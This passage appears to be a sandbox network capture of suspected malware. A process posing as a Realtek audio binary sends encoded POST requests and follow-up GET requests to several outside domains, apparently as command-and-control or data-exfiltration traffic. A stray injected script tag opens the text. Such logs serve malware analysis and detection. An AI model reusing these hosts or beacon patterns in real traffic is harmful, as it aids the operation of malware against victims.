src="http://www.zbywl.com/js.js"></script></div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	49807	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:55.982672930 CET	814	OUT	POST /kgjj/ HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.nextlevel.finance Referer: http://www.nextlevel.finance/kgjj/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 62 54 69 68 36 50 48 78 38 5a 66 73 51 56 64 68 6b 78 72 2f 70 34 31 73 64 6b 6e 59 37 42 78 2b 56 44 2f 51 37 64 62 76 39 39 72 30 6e 6e 33 5a 57 52 2f 51 59 48 47 64 66 71 69 38 2f 36 38 4c 74 33 38 30 35 7a 6d 48 39 77 70 66 68 59 32 7a 4f 6e 6d 59 77 2f 61 6a 66 4c 50 63 6f 2f 6e 41 38 4e 31 78 6f 4d 41 43 6a 79 5a 56 7a 50 46 75 4f 64 47 6e 6d 4f 77 2f 45 6a 6d 69 53 35 57 39 30 36 33 67 4d 31 36 41 68 4f 38 70 4d 30 2b 37 44 72 6f 48 41 7a 55 43 78 5a 51 68 76 4a 78 47 6a 38 30 52 65 77 30 53 2f 33 6b 67 4e 76 52 58 39 30 37 33 32 67 3d 3d Data Ascii: AuPF3v=r2nTWKLo591VbTih6PHx8ZfsQVdhkxr/p41sdknY7Bx+VD/Q7dbv99r0nn3ZWR/QYHGdfqi8/68Lt3805zmH9wpfhY2zOnmYw/ajfLPco/nA8N1xoMACjyZVzPFuOdGnmOw/EjmiS5W9063gM16AhO8pM0+7DroHAzUCxZQhvJxGj80Rew0S/3kgNvRX90732g==
Jan 13, 2025 10:23:56.084060907 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	49808	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:58.614315987 CET	834	OUT	POST /kgjj/ HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.nextlevel.finance Referer: http://www.nextlevel.finance/kgjj/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 46 2b 57 6a 50 51 36 5a 33 76 38 39 72 30 7a 58 33 41 59 78 2f 48 59 48 4b 56 66 76 43 38 2f 38 51 4c 74 79 51 30 2b 41 2b 49 2b 41 70 64 70 34 32 31 44 48 6d 59 77 2f 61 6a 66 4c 62 6d 6f 2f 76 41 2f 2b 74 78 75 5a 38 42 74 53 5a 61 30 50 46 75 45 39 47 6a 6d 4f 77 42 45 6e 2f 31 53 37 75 39 30 34 76 67 4d 6b 36 44 36 2b 38 6e 52 6b 2b 6f 4d 4f 52 2f 65 41 73 47 78 72 63 42 76 37 56 54 69 71 35 4c 44 43 41 32 38 6b 34 53 4a 66 6f 2f 2f 32 36 73 72 68 51 41 5a 55 63 4b 6c 50 56 46 54 56 2b 32 30 66 71 41 68 61 30 3d Data Ascii: AuPF3v=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7TF+WjPQ6Z3v89r0zX3AYx/HYHKVfvC8/8QLtyQ0+A+I+Apdp421DHmYw/ajfLbmo/vA/+txuZ8BtSZa0PFuE9GjmOwBEn/1S7u904vgMk6D6+8nRk+oMOR/eAsGxrcBv7VTiq5LDCA28k4SJfo//26srhQAZUcKlPVFTV+20fqAha0=
Jan 13, 2025 10:23:58.715753078 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	49809	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:02.252000093 CET	2578	OUT	POST /kgjj/ HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.nextlevel.finance Referer: http://www.nextlevel.finance/kgjj/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 72 32 6e 54 57 4b 4c 6f 35 39 31 56 55 53 53 68 70 2b 48 78 70 70 66 76 56 56 64 68 74 52 71 34 70 34 70 73 64 6c 54 49 37 54 64 2b 57 51 33 51 36 34 33 76 36 4e 72 30 77 58 33 46 59 78 2f 2f 59 44 75 52 66 76 65 73 2f 2f 6b 4c 69 30 45 30 37 78 2b 49 6c 51 70 64 32 6f 32 77 4f 6e 6d 33 77 35 36 2f 66 4c 4c 6d 6f 2f 76 41 2f 34 42 78 34 38 41 42 76 53 5a 56 7a 50 46 79 4f 64 47 50 6d 4b 6b 33 45 6e 71 49 53 50 53 39 30 59 2f 67 4a 58 53 44 32 2b 39 42 43 55 2f 31 4d 4f 56 67 65 41 68 2f 78 71 6f 37 76 38 4a 54 67 64 67 4f 55 42 74 74 6c 55 6f 43 55 38 6b 35 72 58 43 46 6a 44 51 38 49 6e 49 6c 69 70 5a 58 64 47 61 71 70 4b 75 44 79 2f 46 47 77 7a 43 52 46 4b 30 39 42 6e 46 34 75 73 4a 4b 67 6c 4e 54 75 49 69 4b 54 58 70 33 45 44 79 31 49 73 46 34 63 77 6e 4b 53 70 53 77 2b 71 66 44 61 59 38 4f 7a 49 66 67 50 36 2f 6b 6f 51 63 58 56 4c 72 4c 50 44 6c 30 65 73 64 48 79 38 52 45 78 77 6e 37 6b 41 70 36 6a 33 39 48 76 37 55 44 47 36 4e 61 6c 63 5a 6c 4a 31 4a 77 69 44 74 7a 48 33 2b [TRUNCATED] Data Ascii: AuPF3v=r2nTWKLo591VUSShp+HxppfvVVdhtRq4p4psdlTI7Td+WQ3Q643v6Nr0wX3FYx//YDuRfves//kLi0E07x+IlQpd2o2wOnm3w56/fLLmo/vA/4Bx48ABvSZVzPFyOdGPmKk3EnqISPS90Y/gJXSD2+9BCU/1MOVgeAh/xqo7v8JTgdgOUBttlUoCU8k5rXCFjDQ8InIlipZXdGaqpKuDy/FGwzCRFK09BnF4usJKglNTuIiKTXp3EDy1IsF4cwnKSpSw+qfDaY8OzIfgP6/koQcXVLrLPDl0esdHy8RExwn7kAp6j39Hv7UDG6NalcZlJ1JwiDtzH3+jTeh5zqsAUZmAQQfNT/YXnvXyc/VSMYgbkScgdoJzVT5h1tswylVf0rBm1zzs5BnQ6joVA8LQPSjX5oxjG+9XkuHrmDWcGIsnvI4geV0eclR+Mif9RFzV866nw/nK/hAwQD05iPK8TBwKFLA2Jdc3IoymcouxkztrL8z2CqrpEaLQwVVW3PsKtbISOmXEsbWxi7TGsdkuMiqKsXjAQJCpnphT3aywQ0gF9VMmfMyIXm11UG/VCggZSpvg4ErsL/e1jNou0b/r/Fzla3ORo5V8CW76xQUoJKCqQ++oEM8ud3DLTcLqiTsGkf5kiu6AKCLT1JO6G8QGd5tm7RHx/V7PjmoBBlGMhe8qDHE0yy0zY8dZH8ys8RfMXca7MAOSWzIbOs8b6Mq2RcIRImPl8Vp+pE+LvwPPPNkpM/0oI2CF66D4bAXFZZjS/kL1RkNHr8l7EuiScSkCjhWOwHBdVJy1n3MwGNWbmNNXxGVbnJvEZq3VD5Eg8Aa4mK3B8f7ZWBq8Qpus0XAds0zxFrrbHVmqvsvpFP+mQ2l/Jc3kHBxvIOsNF5vWTQV5dwaAVL7vCRvTXbz3AWsksySGyRlxTVRv639wJGqsQAfnFSRi/XwGdfoAFaaPVfr3gnwjwXqkdMr75D6elTx+HbgmeksOu846HubUcoCkV312U [TRUNCATED]
Jan 13, 2025 10:24:02.252027988 CET	2578	OUT	Data Raw: 69 6a 50 4d 36 4a 63 77 41 75 34 64 70 30 32 75 31 56 4c 4a 46 79 2b 37 48 69 54 47 64 68 37 76 4f 46 66 33 47 37 56 69 35 56 68 54 6b 64 67 46 35 39 42 37 4b 30 54 43 79 4b 71 73 45 42 57 68 53 68 77 35 57 56 48 33 4d 57 5a 50 53 57 73 55 38 50 Data Ascii: ijPM6JcwAu4dp02u1VLJFy+7HiTGdh7vOFf3G7Vi5VhTkdgF59B7K0TCyKqsEBWhShw5WVH3MWZPSWsU8PxgmkTxyhA6pTmoK3ADfYHB9hemsPRjqtg7pZIJtHQa2+GKh2vROXlLqd/ZQ8hjwbjWf72Iu1GTXfBqoQ7p1pzItAxu7u5EERYHHE2Xf02khSecW+b0yUzUhMMbx7QdkSnRQvmMOJdoJUcK2FTpk+XjlDdeT7GoeWz
Jan 13, 2025 10:24:02.353498936 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close
Jan 13, 2025 10:24:02.353713036 CET	2578	OUT	Data Raw: 63 62 36 6e 75 76 72 50 61 79 32 39 72 48 46 51 6a 44 34 2f 6d 75 37 31 33 51 77 50 48 63 6a 46 72 41 6c 67 47 67 71 38 58 39 68 73 38 41 41 6d 6f 51 30 50 68 46 6c 69 2b 69 43 57 51 4c 42 39 4a 31 4c 42 62 4c 67 50 67 45 6d 49 54 2b 76 31 66 4a Data Ascii: cb6nuvrPay29rHFQjD4/mu713QwPHcjFrAlgGgq8X9hs8AAmoQ0PhFli+iCWQLB9J1LBbLgPgEmIT+v1fJKkK6CEIhnrHBUgQKRkvQ7wcSgEkiHJYUpv4fcnFbVvmfunbn2BYolBtTZobesUolc8YBXnzbeKR6YJUyBA+ncFZssR4nebqCu4gHCuh/fLBzjBe34EKkMv84VVM3kjbgb8QK8bc0td4CMsbstGxUMCcrXwiAza5GN
Jan 13, 2025 10:24:02.354377985 CET	249	OUT	Data Raw: 31 74 71 69 41 4a 61 54 75 72 42 5a 53 78 32 76 6d 6d 42 52 59 39 6a 69 34 75 46 75 50 66 53 71 65 68 41 67 4e 44 61 50 61 57 35 46 4b 63 6b 75 46 6e 4d 62 5a 42 72 2f 73 63 37 31 35 43 54 75 68 6f 74 75 47 6a 50 32 75 61 70 39 2b 75 47 49 6e 49 Data Ascii: 1tqiAJaTurBZSx2vmmBRY9ji4uFuPfSqehAgNDaPaW5FKckuFnMbZBr/sc715CTuhotuGjP2uap9+uGInIncGs2DLF8d20oz9tVpJI+0f7K77mRKjgCZCN4zbPqZwudY1PDImodhrve9dKegoUNlGLGS8l6t06BGJzrEQTGFm6iHDE3L1vStI6tneWcWlaXzDWYjG+ddTLQvR2mf+c8/FQbI1D6Fqcm6TiZiVvl66y48n6/BCPX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	49810	13.248.169.48	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:04.879390955 CET	535	OUT	GET /kgjj/?v1GdZ=vUN3&AuPF3v=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0= HTTP/1.1 Host: www.nextlevel.finance Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:24:05.990734100 CET	374	IN	HTTP/1.1 200 OK content-type: text/html date: Mon, 13 Jan 2025 09:24:05 GMT content-length: 253 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 31 47 64 5a 3d 76 55 4e 33 26 41 75 50 46 33 76 3d 6d 30 50 7a 56 2b 44 4c 39 4d 64 68 51 69 65 36 75 71 2f 61 6d 72 76 56 52 33 35 51 38 54 66 2f 6c 6f 74 59 55 58 2b 41 68 6a 4d 6f 51 41 37 46 33 4b 33 46 6a 50 76 38 6b 56 2f 51 42 77 2f 50 64 55 2f 4f 58 4d 2f 72 69 2f 49 62 72 46 59 47 34 78 79 70 69 41 42 77 6e 61 53 57 52 45 47 55 33 75 75 37 5a 59 58 6b 75 4d 4c 42 6e 74 42 41 6f 74 6b 73 6b 68 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?v1GdZ=vUN3&AuPF3v=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.11.20	49811	103.106.67.112	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:11.446249962 CET	799	OUT	POST /k29t/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.furrcali.xyz Referer: http://www.furrcali.xyz/k29t/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 31 75 48 2f 38 50 70 72 50 6b 36 49 7a 6c 42 37 32 78 71 35 53 7a 70 78 31 6b 42 31 4e 75 58 58 52 42 49 7a 78 64 52 31 38 77 6d 67 6a 57 45 48 75 36 4d 73 4f 5a 43 39 6c 41 34 5a 67 56 39 56 31 58 6f 36 52 54 36 54 54 2f 58 51 5a 43 4d 62 2b 2b 41 71 67 50 4e 59 30 75 76 41 41 6f 65 52 75 54 4c 63 50 54 2b 38 61 77 44 4f 63 52 78 59 69 6d 44 54 47 43 6d 77 4a 4e 79 52 53 6a 45 6b 36 78 4f 66 35 44 73 72 6e 6e 79 6a 75 59 4d 36 6f 36 7a 6e 38 78 33 43 4d 4d 30 33 58 34 39 61 59 69 78 4a 68 52 66 70 71 2f 6f 4e 75 4b 56 74 69 50 65 2f 51 3d 3d Data Ascii: AuPF3v=rJkYOGdVVG3na1uH/8PprPk6IzlB72xq5Szpx1kB1NuXXRBIzxdR18wmgjWEHu6MsOZC9lA4ZgV9V1Xo6RT6TT/XQZCMb++AqgPNY0uvAAoeRuTLcPT+8awDOcRxYimDTGCmwJNyRSjEk6xOf5DsrnnyjuYM6o6zn8x3CMM03X49aYixJhRfpq/oNuKVtiPe/Q==
Jan 13, 2025 10:24:11.690412045 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Mon, 13 Jan 2025 09:24:11 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.11.20	49812	103.106.67.112	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:14.139627934 CET	819	OUT	POST /k29t/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.furrcali.xyz Referer: http://www.furrcali.xyz/k29t/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 57 58 58 77 78 49 79 77 64 52 67 38 77 6d 30 7a 58 76 59 2b 36 44 73 4f 56 6b 39 6c 4d 34 5a 67 78 39 56 30 6e 6f 36 69 37 35 51 6a 2f 52 64 35 43 4f 52 65 2b 41 71 67 50 4e 59 30 36 46 41 41 41 65 53 64 37 4c 66 75 54 39 32 36 77 41 48 38 52 78 4b 53 6d 50 54 47 43 59 77 4e 46 63 52 51 72 45 6b 2b 31 4f 66 73 2f 72 77 33 6e 6f 74 4f 5a 6a 2f 70 71 35 6f 49 42 6b 53 64 73 2f 76 32 77 31 66 4f 76 72 55 54 6c 37 71 35 6a 61 4a 65 7a 39 76 67 4f 46 69 56 73 42 34 7a 62 38 57 7a 38 78 6f 36 58 78 63 6a 47 69 4b 5a 6b 3d Data Ascii: AuPF3v=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17WXXwxIywdRg8wm0zXvY+6DsOVk9lM4Zgx9V0no6i75Qj/Rd5CORe+AqgPNY06FAAAeSd7LfuT926wAH8RxKSmPTGCYwNFcRQrEk+1Ofs/rw3notOZj/pq5oIBkSds/v2w1fOvrUTl7q5jaJez9vgOFiVsB4zb8Wz8xo6XxcjGiKZk=
Jan 13, 2025 10:24:14.386363983 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Mon, 13 Jan 2025 09:24:14 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.11.20	49813	103.106.67.112	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:16.826179028 CET	2578	OUT	POST /k29t/ HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.furrcali.xyz Referer: http://www.furrcali.xyz/k29t/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 72 4a 6b 59 4f 47 64 56 56 47 33 6e 61 52 53 48 7a 2f 58 70 75 76 6b 35 52 44 6c 42 79 57 78 75 35 53 2f 70 78 30 51 52 31 37 65 58 57 47 46 49 79 58 4a 52 6d 4d 77 6d 33 7a 57 49 59 2b 36 61 73 4b 35 67 39 6c 52 4e 5a 69 35 39 55 57 76 6f 72 6a 37 35 48 54 2f 52 42 4a 43 4c 62 2b 2b 52 71 6b 54 42 59 30 71 46 41 41 41 65 53 62 48 4c 4a 50 54 39 77 36 77 44 4f 63 52 39 59 69 6d 72 54 47 61 58 77 4e 42 69 57 68 4c 45 6c 61 52 4f 64 65 58 72 74 6e 6e 75 75 4f 5a 37 2f 70 6e 6a 6f 4f 6c 43 53 65 78 6f 76 33 34 31 65 35 71 4e 4f 54 74 5a 75 36 62 36 4e 63 4c 2f 6e 44 6a 52 6d 32 70 34 33 43 62 46 57 6e 68 70 71 71 44 73 49 79 4b 33 64 73 36 4f 30 71 4c 4c 56 57 77 59 32 31 2f 75 6e 46 6c 68 48 75 36 31 61 4f 75 7a 76 59 39 42 77 51 72 78 67 30 59 74 7a 37 55 69 65 77 5a 50 53 63 47 52 44 76 6d 72 57 45 5a 48 78 50 41 52 68 33 58 65 74 53 43 53 53 5a 72 33 53 74 49 4d 56 4a 68 6b 54 31 47 66 36 7a 52 59 54 46 6e 4c 38 45 37 4c 4b 38 36 6f 77 58 67 74 54 44 45 51 4b 56 6b 4b 69 7a 77 [TRUNCATED] Data Ascii: AuPF3v=rJkYOGdVVG3naRSHz/Xpuvk5RDlByWxu5S/px0QR17eXWGFIyXJRmMwm3zWIY+6asK5g9lRNZi59UWvorj75HT/RBJCLb++RqkTBY0qFAAAeSbHLJPT9w6wDOcR9YimrTGaXwNBiWhLElaROdeXrtnnuuOZ7/pnjoOlCSexov341e5qNOTtZu6b6NcL/nDjRm2p43CbFWnhpqqDsIyK3ds6O0qLLVWwY21/unFlhHu61aOuzvY9BwQrxg0Ytz7UiewZPScGRDvmrWEZHxPARh3XetSCSSZr3StIMVJhkT1Gf6zRYTFnL8E7LK86owXgtTDEQKVkKizwTq7NZbRHCUzrnu+BWtetApAfc91IfP5OGSp5I8uSfn6ky/495HTT6wNL1jLedJw7xtP8iMsRdpU14c2UNJpNQu9uqiApObEjz9Ga+t7JInw21qjAHj2LMDR8dU+DheFMQXR/muK9VvdKoaQ5dioH8JHAF5YiGYUSs+eZjiYT+ZpKcFOk3CD+JLvkSZzVSGgmGzoKLsiY3BPG5HJxaH8nAWoxzD8wt1FSi67uNhG02ehyCHO/R39natKTcdY/9A4SIAbUbg1u8qJE37tfMzBFiGa3Aw8gmeQgY9IALojq+WeQ0hJBOZOiiGWSJqzTSTQw6zTmNOEc6Elqd3fnj/LfWqPvJ0L7nMoWiN5u+z2pus4g66LD0JYyczlVOC64Lm4qoRuewE2etYlfqTuEKHpnOSPBGd6kDN5kMqNwufp2D0fhYWw04MF7V50QLPKD7wguPRftVLBspsIY+wZHBtZnobDPoWtIpCIR6CzPUd5mNmJlW7dE+Hop5SE+I+TXrQKy/S6jUjo2oVCEM1I86a9aO9IK4XhI/3vVSEuPCS/d2SMte6bOAwkmb9gDTevMVCtZsBwYS1pjVmKhKT/1INHCoij5xg/QZsPDif3dBVtblNWU7cGZN3IEfrDgbXioFhW5zGijcj9V4iifg3sk1OEVQWN9D+Jmq0s9Ef [TRUNCATED]
Jan 13, 2025 10:24:16.826250076 CET	5390	OUT	Data Raw: 47 37 42 35 44 53 55 6b 30 52 77 44 4b 67 69 39 73 47 69 30 59 43 50 74 56 7a 69 6e 37 46 47 38 4d 47 6c 34 65 37 31 45 52 41 31 50 34 46 44 4d 64 36 56 79 73 6f 51 61 56 73 43 70 4b 31 6a 79 32 54 73 65 4d 4c 7a 46 61 53 71 67 6f 5a 32 70 53 53 Data Ascii: G7B5DSUk0RwDKgi9sGi0YCPtVzin7FG8MGl4e71ERA1P4FDMd6VysoQaVsCpK1jy2TseMLzFaSqgoZ2pSS7jYmA1Ij0VYvip0IOro1HMYmtydfeFdTSRdnpZt3SsbsKXhtGhDcPpwR3UdZ/a8kp99rbUiGdLZw0VyUChxPPoEtPk6TaHAQvskgiViXCHXZsTD2ZtJYx256Nk7fiQmQxKjxQzALWslC6d9DIGInqL1NEQsC0+Bi3
Jan 13, 2025 10:24:17.069889069 CET	242	IN	HTTP/1.1 302 Found Location: https://www.furrcali.xyz/k29t/ Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Mon, 13 Jan 2025 09:24:16 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.11.20	49814	103.106.67.112	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:19.512242079 CET	530	OUT	GET /k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&v1GdZ=vUN3 HTTP/1.1 Host: www.furrcali.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:24:19.758368015 CET	619	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Location: https://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&v1GdZ=vUN3 Server: Dynamic Http Server X-Ratelimit-Limit: 101 X-Ratelimit-Remaining: 100 X-Ratelimit-Reset: 1 Date: Mon, 13 Jan 2025 09:24:19 GMT Content-Length: 196 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 75 72 72 63 61 6c 69 2e 78 79 7a 2f 6b 32 39 74 2f 3f 41 75 50 46 33 76 3d 6d 4c 4d 34 4e 79 56 33 52 6d 37 4c 53 46 36 32 7a 71 33 71 70 73 73 73 42 31 46 37 6a 55 6b 66 6c 43 2f 63 77 58 39 58 78 39 65 44 51 42 4a 37 2f 67 4e 74 35 39 63 75 6a 67 4c 57 47 65 79 67 70 64 73 48 75 48 51 36 5a 54 31 6e 5a 45 65 45 36 41 7a 71 50 44 44 4d 52 6f 36 58 47 70 75 44 31 58 48 69 61 56 36 78 4f 6a 31 69 4a 2b 2f 30 5a 39 6a 54 34 59 67 3d 26 61 6d 70 3b 76 31 47 64 5a 3d 76 55 4e 33 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.furrcali.xyz/k29t/?AuPF3v=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&v1GdZ=vUN3">Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.11.20	49815	104.21.112.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:24.994370937 CET	811	OUT	POST /w98i/ HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.buyspeechst.shop Referer: http://www.buyspeechst.shop/w98i/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 72 52 6d 59 52 45 66 59 6a 55 34 4b 30 33 6e 2f 39 76 62 66 43 6a 35 71 49 6a 4b 6c 4f 46 31 62 7a 75 55 74 67 39 42 7a 7a 46 6b 30 49 7a 48 6b 6b 4f 45 4e 4d 70 2f 31 37 4b 58 4f 42 35 69 65 52 35 51 52 43 32 4a 75 6e 75 37 6e 4c 6f 37 50 67 66 38 